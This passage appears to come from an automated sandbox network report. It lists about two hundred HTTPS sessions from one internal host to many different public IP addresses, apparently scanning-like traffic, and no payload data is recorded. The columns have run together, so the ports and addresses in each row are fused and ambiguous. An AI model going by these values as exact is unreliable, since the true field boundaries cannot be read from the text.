                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15480192.168.2.235866048.123.179.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15481192.168.2.2359196184.187.159.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15482192.168.2.235740284.172.78.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15483192.168.2.2359392106.211.180.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15484192.168.2.236028241.71.196.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15485192.168.2.235015266.197.76.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15486192.168.2.2356384111.103.151.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15487192.168.2.2358410102.218.16.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15488192.168.2.2356404196.184.93.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15489192.168.2.235273872.71.117.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15490192.168.2.236063268.157.136.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15491192.168.2.234693495.228.77.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15492192.168.2.233587036.82.166.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15493192.168.2.2347326131.92.134.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15494192.168.2.2357620195.254.56.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15495192.168.2.234921442.72.59.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15496192.168.2.2337534141.119.23.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15497192.168.2.234762231.31.208.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15498192.168.2.2338710179.175.120.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15499192.168.2.234411674.14.77.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15500192.168.2.234205448.220.177.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15501192.168.2.2351084112.122.176.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15502192.168.2.233505871.186.100.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15503192.168.2.2345430211.232.248.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15504192.168.2.235498653.11.114.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15505192.168.2.2345674111.23.35.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15506192.168.2.2357810121.93.77.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15507192.168.2.2352518220.35.8.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15508192.168.2.234740082.52.231.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15509192.168.2.233441671.51.45.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15510192.168.2.235717017.99.17.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15511192.168.2.235186874.80.73.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15512192.168.2.2336914184.137.127.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15513192.168.2.235759262.61.185.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15514192.168.2.2359906131.173.234.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15515192.168.2.2349186169.185.89.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15516192.168.2.2348704148.30.165.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15517192.168.2.2333524194.182.209.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15518192.168.2.234922072.58.84.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15519192.168.2.2360444125.18.114.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15520192.168.2.235027076.185.225.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15521192.168.2.2337286211.19.95.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15522192.168.2.234404483.179.168.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15523192.168.2.233784851.94.151.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15524192.168.2.2345588198.68.132.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15525192.168.2.234860034.48.180.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15526192.168.2.2344798159.114.234.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15527192.168.2.2347724155.211.117.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15528192.168.2.234549691.40.129.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15529192.168.2.233456087.103.17.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15530192.168.2.2347418102.106.143.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15531192.168.2.2357572173.219.91.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15532192.168.2.2358720138.86.8.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15533192.168.2.2333950218.54.189.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15534192.168.2.234792219.191.6.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15535192.168.2.2358534218.118.82.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15536192.168.2.235082463.134.113.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15537192.168.2.2360640197.34.187.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15538192.168.2.2348204123.149.161.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15539192.168.2.2340220173.167.156.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15540192.168.2.2336300133.162.213.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15541192.168.2.235658897.189.245.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15542192.168.2.2350744204.37.46.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15543192.168.2.2338672202.244.250.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15544192.168.2.2340166153.222.186.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15545192.168.2.234489820.64.40.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15546192.168.2.2336118157.114.237.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15547192.168.2.2342598126.227.163.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15548192.168.2.2355956121.65.201.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15549192.168.2.233994653.24.122.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15550192.168.2.233877882.197.245.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15551192.168.2.233910278.108.170.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15552192.168.2.234595634.233.194.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15553192.168.2.234163471.153.248.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15554192.168.2.2340062114.148.187.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15555192.168.2.233293893.0.46.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15556192.168.2.2347572119.49.194.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15557192.168.2.2360198143.88.168.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15558192.168.2.2358740223.211.61.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15559192.168.2.235460034.239.55.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15560192.168.2.2359980186.25.24.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15561192.168.2.234243657.91.104.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15562192.168.2.2354596186.71.161.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15563192.168.2.235708689.145.247.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15564192.168.2.2343920158.35.85.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15565192.168.2.2348952170.66.177.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15566192.168.2.2347864164.172.28.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15567192.168.2.2342422184.158.199.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15568192.168.2.2357434199.145.173.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15569192.168.2.234383069.143.76.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15570192.168.2.235331644.145.54.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15571192.168.2.2344326205.121.214.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15572192.168.2.2353422206.132.112.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15573192.168.2.2360420204.49.240.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15574192.168.2.23452384.42.171.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15575192.168.2.2335520203.189.202.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15576192.168.2.2343316163.37.227.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15577192.168.2.2345614211.255.193.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15578192.168.2.235634669.111.71.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15579192.168.2.2334090153.210.200.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15580192.168.2.2357648171.163.10.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15581192.168.2.2345852125.82.215.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15582192.168.2.2347060113.145.99.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15583192.168.2.2353878173.137.204.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15584192.168.2.235216238.84.55.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15585192.168.2.2351444194.151.39.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15586192.168.2.2336084130.103.151.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15587192.168.2.2357016153.124.233.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15588192.168.2.2335412213.107.218.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15589192.168.2.2353278174.0.47.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15590192.168.2.2349382198.139.135.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15591192.168.2.2336160160.135.229.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15592192.168.2.2347978156.165.54.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15593192.168.2.2338434170.198.90.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15594192.168.2.233681093.253.60.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15595192.168.2.2336214133.98.56.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15596192.168.2.2340658183.63.32.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15597192.168.2.2337660113.32.54.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15598192.168.2.2354456157.194.143.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15599192.168.2.2337380143.169.65.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15600192.168.2.235398635.113.183.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15601192.168.2.2343144106.155.97.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15602192.168.2.234326212.50.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15603192.168.2.2349346221.8.232.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15604192.168.2.2341282126.187.220.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15605192.168.2.2341022193.187.166.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15606192.168.2.2349582101.46.56.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15607192.168.2.2357840108.158.57.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15608192.168.2.235522217.187.141.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15609192.168.2.2335482145.61.167.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15610192.168.2.2338584189.92.159.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15611192.168.2.2343796213.12.60.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15612192.168.2.235722220.167.24.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15613192.168.2.2359870101.152.132.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15614192.168.2.2332948137.20.173.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15615192.168.2.2352942173.117.66.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15616192.168.2.2336786153.24.192.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15617192.168.2.234064079.197.181.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15618192.168.2.2359876158.134.118.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15619192.168.2.2340670160.100.195.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15620192.168.2.233756446.245.79.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15621192.168.2.235922690.231.75.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15622192.168.2.2344150113.255.121.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15623192.168.2.2333392152.122.211.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15624192.168.2.2339812118.110.58.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15625192.168.2.235516269.49.171.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15626192.168.2.2346322148.57.141.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15627192.168.2.2346502132.33.166.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15628192.168.2.2353542208.14.153.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15629192.168.2.2346656189.100.194.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15630192.168.2.235863886.34.168.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15631192.168.2.23600629.31.121.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15632192.168.2.2354716109.144.15.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15633192.168.2.2336110134.179.75.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15634192.168.2.2358816194.102.229.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15635192.168.2.2347770117.6.59.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15636192.168.2.2342048223.158.170.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15637192.168.2.235123866.140.157.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15638192.168.2.2343494151.223.56.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15639192.168.2.2360062146.173.93.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15640192.168.2.235140850.105.21.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15641192.168.2.235882442.150.131.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15642192.168.2.2336620151.108.142.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15643192.168.2.2342226149.238.139.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15644192.168.2.233981041.145.22.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15645192.168.2.233511896.113.183.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15646192.168.2.2341690179.124.82.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15647192.168.2.235365460.207.50.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15648192.168.2.2343762200.222.115.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15649192.168.2.2345256175.137.121.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15650192.168.2.2340164190.181.157.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15651192.168.2.2358738119.204.183.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15652192.168.2.2351788172.42.194.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15653192.168.2.2360816132.52.0.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15654192.168.2.2359624177.118.4.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15655192.168.2.2333444123.33.70.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15656192.168.2.234799059.36.132.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15657192.168.2.2333134184.224.34.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15658192.168.2.233692288.253.225.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15659192.168.2.2335024223.137.226.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15660192.168.2.2332846198.131.24.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15661192.168.2.233290089.198.216.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15662192.168.2.2334374180.190.27.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15663192.168.2.2351256203.200.91.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15664192.168.2.2355066199.137.16.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15665192.168.2.2349410173.28.40.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15666192.168.2.235463461.53.147.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15667192.168.2.2344548156.208.52.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15668192.168.2.234977817.1.83.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15669192.168.2.2352010108.211.215.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15670192.168.2.234943884.111.180.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15671192.168.2.236065887.79.185.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15672192.168.2.234265467.141.39.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15673192.168.2.2338848160.99.234.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15674192.168.2.233764460.218.82.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15675192.168.2.2340936163.80.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15676192.168.2.233898457.146.43.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15677192.168.2.2350940166.8.243.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15678192.168.2.234700061.86.218.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15679192.168.2.2348586111.77.206.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15680192.168.2.235732485.195.136.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15681192.168.2.233820045.84.195.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15682192.168.2.2353542121.230.157.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15683192.168.2.233868285.210.24.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15684192.168.2.2340652134.214.187.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15685192.168.2.234922620.146.102.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15686192.168.2.2360118203.56.195.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15687192.168.2.2336304158.73.30.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15688192.168.2.233542027.171.120.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15689192.168.2.2349704129.40.242.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15690192.168.2.2335716135.202.196.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15691192.168.2.2356096128.243.249.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15692192.168.2.235443245.220.130.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15693192.168.2.234621298.17.48.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15694192.168.2.235684673.206.32.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15695192.168.2.235057213.200.205.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15696192.168.2.2360912148.24.128.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15697192.168.2.235514450.21.17.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15698192.168.2.235911814.110.238.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15699192.168.2.233497046.98.62.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15700192.168.2.233981448.81.232.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
